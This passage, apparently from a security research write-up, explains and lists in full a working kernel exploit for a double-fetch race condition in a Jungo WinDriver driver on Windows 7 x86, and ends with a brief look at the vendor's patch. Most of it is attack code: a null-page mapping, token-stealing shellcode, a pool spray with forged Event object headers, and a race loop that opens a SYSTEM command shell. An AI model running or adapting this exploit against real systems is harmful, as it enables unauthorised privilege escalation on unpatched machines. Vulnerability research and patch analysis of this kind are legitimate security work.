0x00f61790 is the address of our token stealing shellcode function, so we have successfully got control of eip.

All of this would be great if we weren’t stuck in an infinite loop, but we are, so we need some way of detecting that we have escalated our privileges in order to break out of the loop and pop a shell. There are a few ways to do this; we could simply set some value in our shellcode and then check it in the while loop. Being relatively new to the Windows API, we decided instead to check whether our current privileges had changed on every iteration of the loop, using the GetTokenInformation function. The process is as follows:

  • Get a handle to the current process token using OpenProcessToken.
  • Make a call to GetTokenInformation to get the required size.
  • Allocate memory on the heap for a PTOKEN_PRIVILEGES structure.
  • Make a second call to GetTokenInformation with the required length.
  • Read the value of PTOKEN_PRIVILEGES->PrivilegeCount.

The following code elaborates on this process:

BOOL check_priv_count(DWORD old_count, PDWORD updated_count)
{
    HANDLE htoken;
    DWORD length = 0;
    PTOKEN_PRIVILEGES current_priv = NULL;

    if (!OpenProcessToken(GetCurrentProcess(), GENERIC_READ, &htoken))
    {
        printf("[x] Couldn't get current token\n");
        return FALSE;
    }

    //get the size required for the current_priv allocation (this call is expected to fail)
    GetTokenInformation(htoken, TokenPrivileges, NULL, 0, &length);

    //allocate memory for the structure
    current_priv = (PTOKEN_PRIVILEGES)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, length);
    if (current_priv == NULL)
    {
        CloseHandle(htoken);
        return FALSE;
    }

    //get the actual token info
    GetTokenInformation(htoken, TokenPrivileges, current_priv, length, &length);
    DWORD new_count = current_priv->PrivilegeCount;

    HeapFree(GetProcessHeap(), 0, current_priv);
    CloseHandle(htoken);

    *updated_count = new_count; //update the count 
    if (new_count > old_count)
    {
        printf("[+] We now have %lu privileges\n", new_count);
        return TRUE;
    }
    else
        return FALSE;
}

One call to this function is made at the beginning of main to get our current privilege count, and another is made during the while loop:

check_priv_count(-1, &orig_priv_count);
printf("[+] Original priv count: %d\n", orig_priv_count);
<…Snip…>
if (check_priv_count(orig_priv_count, &orig_priv_count))
{
    printf("[+] Breaking out of loop, popping shell!\n");
    break;
}

With all of this together, we get our lovely SYSTEM shell:

CODE

The code is presented here, and there are two things to note. The first is the initial instructions in the shellcode that check whether the function has already been hit; without them we were getting an unexpected kernel mode trap bug check. Secondly, on each iteration of the while loop we need to reset the user mode buffer; if we don’t, we end up corrupting an Event object with arbitrary data. We couldn’t trace the cause of this, but we assumed it was down to the buffer being modified by the driver.

// ConsoleApplication1.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <stdio.h>
#include <Windows.h>
#include <winioctl.h>

#define device L"\\\\.\\WINDRVR1251"
#define SPRAY_SIZE 30000

typedef NTSTATUS(NTAPI *PNtAllocateVirtualMemory)(
    HANDLE ProcessHandle,
    PVOID *BaseAddress,
    ULONG_PTR ZeroBits,
    PSIZE_T RegionSize,
    ULONG AllocationType,
    ULONG Protect
    );

// Windows 7 SP1 x86 Offsets
#define KTHREAD_OFFSET    0x124    // nt!_KPCR.PcrbData.CurrentThread
#define EPROCESS_OFFSET   0x050    // nt!_KTHREAD.ApcState.Process
#define PID_OFFSET        0x0B4    // nt!_EPROCESS.UniqueProcessId
#define FLINK_OFFSET      0x0B8    // nt!_EPROCESS.ActiveProcessLinks.Flink
#define TOKEN_OFFSET      0x0F8    // nt!_EPROCESS.Token
#define SYSTEM_PID        0x004    // SYSTEM Process PID
/*
* The caller pushes 4 arguments (0x10 bytes) and expects the callee to pop them
* (stdcall-style cleanup), hence the ret 0x10.
*/
__declspec(naked) VOID TokenStealingShellcode() {
    __asm {
        hasRun:
            xor eax, eax; Set zero
            cmp byte ptr [eax], 1; Flag byte at address 0 in the mapped null page: 1 means we have already run
            jz End;
            mov byte ptr [eax], 1; Indicate that this code has been hit already

            ; initialize
            mov eax, fs:[eax + KTHREAD_OFFSET]; Get nt!_KPCR.PcrbData.CurrentThread
            mov eax, [eax + EPROCESS_OFFSET]; Get nt!_KTHREAD.ApcState.Process

            mov ecx, eax; Copy current _EPROCESS structure

            mov ebx, [eax + TOKEN_OFFSET]; Copy current nt!_EPROCESS.Token
            mov edx, SYSTEM_PID; WIN 7 SP1 SYSTEM Process PID = 0x4

        ; begin system token search loop
        SearchSystemPID :
            mov eax, [eax + FLINK_OFFSET]; Get nt!_EPROCESS.ActiveProcessLinks.Flink
            sub eax, FLINK_OFFSET
            cmp [eax + PID_OFFSET], edx; Get nt!_EPROCESS.UniqueProcessId
            jne SearchSystemPID

            mov edx, [eax + TOKEN_OFFSET]; Get SYSTEM process nt!_EPROCESS.Token
            mov [ecx + TOKEN_OFFSET], edx; Copy nt!_EPROCESS.Token of SYSTEM to current process

        End :
            ret 0x10; pop the 4 pushed arguments (callee cleanup)

    }
}

BOOL map_null_page()
{
    /* Begin NULL page map */
    HMODULE hmodule = LoadLibraryA("ntdll.dll");
    if (hmodule == NULL) //LoadLibraryA returns NULL on failure, not INVALID_HANDLE_VALUE
    {
        printf("[x] Couldn't get handle to ntdll.dll\n");
        return FALSE;
    }
    PNtAllocateVirtualMemory AllocateVirtualMemory = (PNtAllocateVirtualMemory)GetProcAddress(hmodule, "NtAllocateVirtualMemory");
    if (AllocateVirtualMemory == NULL)
    {
        printf("[x] Couldn't get address of NtAllocateVirtualMemory\n");
        return FALSE;
    }

    SIZE_T size = 0x1000;
    PVOID address = (PVOID)0x1;
    NTSTATUS allocStatus = AllocateVirtualMemory(GetCurrentProcess(),
        &address,
        0,
        &size,
        MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,
        PAGE_EXECUTE_READWRITE);

    if (allocStatus != 0)
    {
        printf("[x] Error mapping null page\n");
        return FALSE;
    }
    
    printf("[+] Mapped null page\n");
    return TRUE;
}

/*
* Continually flip the size
* @Param user_size - a pointer to the user defined size
*/
DWORD WINAPI flip_thread(LPVOID user_size)
{
    printf("[+] Flipping thread started\n");
    while (TRUE)
    {
        *(ULONG *)(user_size) ^= 10; //flip between 0x52 and 0x58, giving a 0x40 byte overflow.
    }
    return 0;
}

DWORD WINAPI ioctl_thread(LPVOID user_buff)
{
    char out_buff[40];
    DWORD bytes_returned;
    
    HANDLE hdevice = CreateFile(device,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        0
    );

    
    if (hdevice == INVALID_HANDLE_VALUE)
    {
        printf("[x] Couldn't open device\n");
        return 1; // nothing to do without a device handle
    }

    // DeviceIoControl returns a BOOL, not an NTSTATUS
    BOOL ret = DeviceIoControl(hdevice,
        0x95382623,
        user_buff,
        0x1000,
        out_buff,
        40,
        &bytes_returned,
        0);
    
    CloseHandle(hdevice);
    return 0;
}

void spray_pool(HANDLE handle_arr[])
{
    //create SPRAY_SIZE event objects filling up the pool
    for (int i = 0; i < SPRAY_SIZE; i++)
    {
        handle_arr[i] = CreateEvent(NULL, 0, NULL, L"");
    }

    for (int i = 0; i < SPRAY_SIZE; i+=50)
    {
        for (int j = 0; j < 14 && j + i < SPRAY_SIZE; j++)
        {
            CloseHandle(handle_arr[j + i]);
            handle_arr[j + i] = 0;
        }
    }
}

void free_events(HANDLE handle_arr[])
{
    for (int i = 0; i < SPRAY_SIZE; i++)
    {
        if (handle_arr[i] != 0)
        {
            CloseHandle(handle_arr[i]);
        }
    }
}

BOOL check_priv_count(DWORD old_count, PDWORD updated_count)
{
    HANDLE htoken;
    DWORD length;
    DWORD temp;
    DWORD new_count;
    PTOKEN_PRIVILEGES current_priv = NULL;

    if (!OpenProcessToken(GetCurrentProcess(), GENERIC_READ, &htoken))
    {
        printf("[x] Couldn't get current token\n");
        return FALSE;
    }

    //get the size required for the current_priv allocation
    GetTokenInformation(htoken, TokenPrivileges, current_priv, 0, &length);

    //allocate memory for the structure
    current_priv = (PTOKEN_PRIVILEGES)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, length);

    //get the actual token info
    GetTokenInformation(htoken, TokenPrivileges, current_priv, length, &length);
    new_count = current_priv->PrivilegeCount;

    HeapFree(GetProcessHeap(), 0, current_priv);
    CloseHandle(htoken);

    temp = old_count;       //store the old count
    *updated_count = new_count; //update the count 
    if (new_count > old_count)
    {
        printf("[+] We now have %d privileges\n", new_count);
        return TRUE;
    }
    else
        return FALSE;
}

int main()
{
    HANDLE h_flip_thread;
    HANDLE h_ioctl_thread;
    HANDLE handle_arr[SPRAY_SIZE] = { 0 };
    DWORD mask = 0;
    DWORD orig_priv_count = 0;
    char *user_buff;
    
    check_priv_count(-1, &orig_priv_count);
    printf("[+] Original priv count: %d\n", orig_priv_count);

    if (!map_null_page())
    {
        return -1;
    }

    *(ULONG *)0x74 = (ULONG)&TokenStealingShellcode;

    user_buff = (char *)VirtualAlloc(NULL,
        0x1000,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_NOCACHE | PAGE_READWRITE);

    if (user_buff == NULL)
    {
        printf("[x] Couldn't allocate memory for buffer\n");
        return -1;
    }
    memset(user_buff, 0x41, 0x1000);

    *(ULONG *)(user_buff + 0x34) = 0x00000052; //set the size initially to 0x52

    //pool header block
    *(ULONG *)(user_buff + 0x374) = 0x04080070; //ULONG1
    *(ULONG *)(user_buff + 0x378) = 0xee657645; //PoolTag

    //QuotaInfo block
    *(ULONG *)(user_buff + 0x37c) = 0x00000000; //PagedPoolCharge
    *(ULONG *)(user_buff + 0x380) = 0x00000040; //NonPagedPoolCharge
    *(ULONG *)(user_buff + 0x384) = 0x00000000; //SecurityDescriptorCharge
    *(ULONG *)(user_buff + 0x388) = 0x00000000; //SecurityDescriptorQuotaBlock

    //Event header block
    *(ULONG *)(user_buff + 0x38c) = 0x00000001; //PointerCount
    *(ULONG *)(user_buff + 0x390) = 0x00000001; //HandleCount
    *(ULONG *)(user_buff + 0x394) = 0x00000000; //NextToFree
    *(ULONG *)(user_buff + 0x398) = 0x00080000; //TypeIndex <--- NULL POINTER
    *(ULONG *)(user_buff + 0x39c) = 0x867b3940; //ObjectCreateInfo
    *(ULONG *)(user_buff + 0x400) = 0x00000000;
    *(ULONG *)(user_buff + 0x404) = 0x867b3940; //QuotaBlockCharged



    /*
    * create a suspended thread for flipping, passing in a pointer to the size at user_buff+0x34
    * Set its priority to highest.
    * Set its mask so that it runs on a particular core.
    */
    h_flip_thread = CreateThread(NULL, 0, flip_thread, user_buff + 0x34, CREATE_SUSPENDED, 0);
    SetThreadPriority(h_flip_thread, THREAD_PRIORITY_HIGHEST);
    SetThreadAffinityMask(h_flip_thread, 0);
    ResumeThread(h_flip_thread);
    printf("[+] Starting race...\n");

    spray_pool(handle_arr);

    while (TRUE)
    {
        h_ioctl_thread = CreateThread(NULL, 0, ioctl_thread, user_buff, CREATE_SUSPENDED, 0);
        SetThreadPriority(h_ioctl_thread, THREAD_PRIORITY_HIGHEST);
        SetThreadAffinityMask(h_ioctl_thread, 1);
        
        ResumeThread(h_ioctl_thread);
        
        WaitForSingleObject(h_ioctl_thread, INFINITE);

        free_events(handle_arr); //free the event objects 

        if (check_priv_count(orig_priv_count, &orig_priv_count))
        {
            printf("[+] Breaking out of loop, popping shell!\n");
            break;
        }
        //rewrite the fake headers before the next attempt
        //pool header block
        *(ULONG *)(user_buff + 0x374) = 0x04080070; //ULONG1
        *(ULONG *)(user_buff + 0x378) = 0xee657645; //PoolTag

        //QuotaInfo block
        *(ULONG *)(user_buff + 0x37c) = 0x00000000; //PagedPoolCharge
        *(ULONG *)(user_buff + 0x380) = 0x00000040; //NonPagedPoolCharge
        *(ULONG *)(user_buff + 0x384) = 0x00000000; //SecurityDescriptorCharge
        *(ULONG *)(user_buff + 0x388) = 0x00000000; //SecurityDescriptorQuotaBlock

        //Event header block
        *(ULONG *)(user_buff + 0x38c) = 0x00000001; //PointerCount
        *(ULONG *)(user_buff + 0x390) = 0x00000001; //HandleCount
        *(ULONG *)(user_buff + 0x394) = 0x00000000; //NextToFree
        *(ULONG *)(user_buff + 0x398) = 0x00080000; //TypeIndex <--- NULL POINTER
        *(ULONG *)(user_buff + 0x39c) = 0x867b3940; //ObjectCreateInfo
        *(ULONG *)(user_buff + 0x400) = 0x00000000;
        *(ULONG *)(user_buff + 0x404) = 0x867b3940; //QuotaBlockCharged

        
        spray_pool(handle_arr);
    }

    system("cmd.exe");

    return 0;
}

THE PATCH

Jungo released a patch for this vulnerability relatively quickly. The simplest mitigation for a double fetch is to read each value from user mode exactly once and store it in a local (kernel-space) variable, so that every later check and use sees the same value.
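The single-fetch idea can be sketched in plain user-mode C. This is an illustration only, not the driver's code: the `request_t` layout, the `MAX_COUNT` bound, and the function name are all hypothetical, and `malloc` stands in for a pool allocation. Only the `0xa` multiplier and the `0x3a` constant are taken from the disassembly discussed in this section.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical request layout: a caller-controlled count followed by data. */
typedef struct {
    volatile uint32_t count;  /* another thread may change this at any time */
    uint8_t data[0x100];
} request_t;

#define ENTRY_SIZE  0xa   /* multiplier seen in the disassembly */
#define HEADER_SIZE 0x3a  /* constant seen in the disassembly */
#define MAX_COUNT   0x10  /* assumed bound, chosen so the copy fits in data[] */

/* Returns the number of bytes copied, or 0 if the request is rejected. */
size_t copy_request_single_fetch(const request_t *user, uint8_t **out)
{
    assert(user != NULL && out != NULL);

    /* Fetch the count exactly once; all later uses refer to this snapshot. */
    uint32_t count = user->count;
    if (count > MAX_COUNT)
        return 0;

    /* Allocation size and copy length both derive from the same local. */
    size_t len = (size_t)count * ENTRY_SIZE + HEADER_SIZE;
    uint8_t *buf = malloc(len);
    if (buf == NULL)
        return 0;

    memcpy(buf, user->data, len);
    *out = buf;
    return len;
}
```

Because `count` is read into a local before validation, a concurrent writer changing `user->count` afterwards cannot make the allocation size and the copy length disagree.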

A quick analysis of the patch shows that this is what was implemented. Starting in the IOCTL handler, we see the following:

This is quite different from the vulnerable code. The size value from our user-space buffer is stored in ecx, multiplied by 0xa, has 0x3A added to it, and the result is pushed as an argument to sub_419CA2. In sub_419CA2, the user-mode buffer is still referenced multiple times, but the size value itself (at user_buff+0x34) is never fetched again.

At the start of the function, for example, the value used is the argument pushed on the stack, which we cannot control from user mode. Note also the hardcoded size value of 0x800, which fixes the previously mentioned integer overflow.

Finally, in the vulnerable copying loop:

For reference, arg_4 is the size we passed ([user_buff+0x34] * 0xa + 0x3A), ebx is the pool buffer (of size [user_buff+0x34] * 0xa + 0x48), and edi is the user buffer. Here too the value is read from the function's stack frame rather than from user memory, which mitigates the vulnerability present in the previous version.
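The arithmetic behind these two sizes can be checked with a short sketch. The helper names below are hypothetical and the calculation is widened to 64 bits purely for the illustration; the constants are the ones quoted above. It shows that when both sizes derive from the same value, the pool buffer always exceeds the copy length by 0xe bytes, and that the guarantee disappears if the two were ever computed from different values.

```c
#include <stdbool.h>
#include <stdint.h>

/* Pool buffer size for a given size field n: n * 0xa + 0x48. */
uint64_t pool_size(uint32_t n)
{
    return (uint64_t)n * 0xa + 0x48;
}

/* Copy length for a given size field n: n * 0xa + 0x3A. */
uint64_t copy_size(uint32_t n)
{
    return (uint64_t)n * 0xa + 0x3a;
}

/* True if a copy sized from copy_n fits in a buffer sized from alloc_n. */
bool copy_fits(uint32_t alloc_n, uint32_t copy_n)
{
    return copy_size(copy_n) <= pool_size(alloc_n);
}
```

With a single fetched value, `copy_fits(n, n)` holds for every `n`, since the difference is the constant `0x48 - 0x3a = 0xe`.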
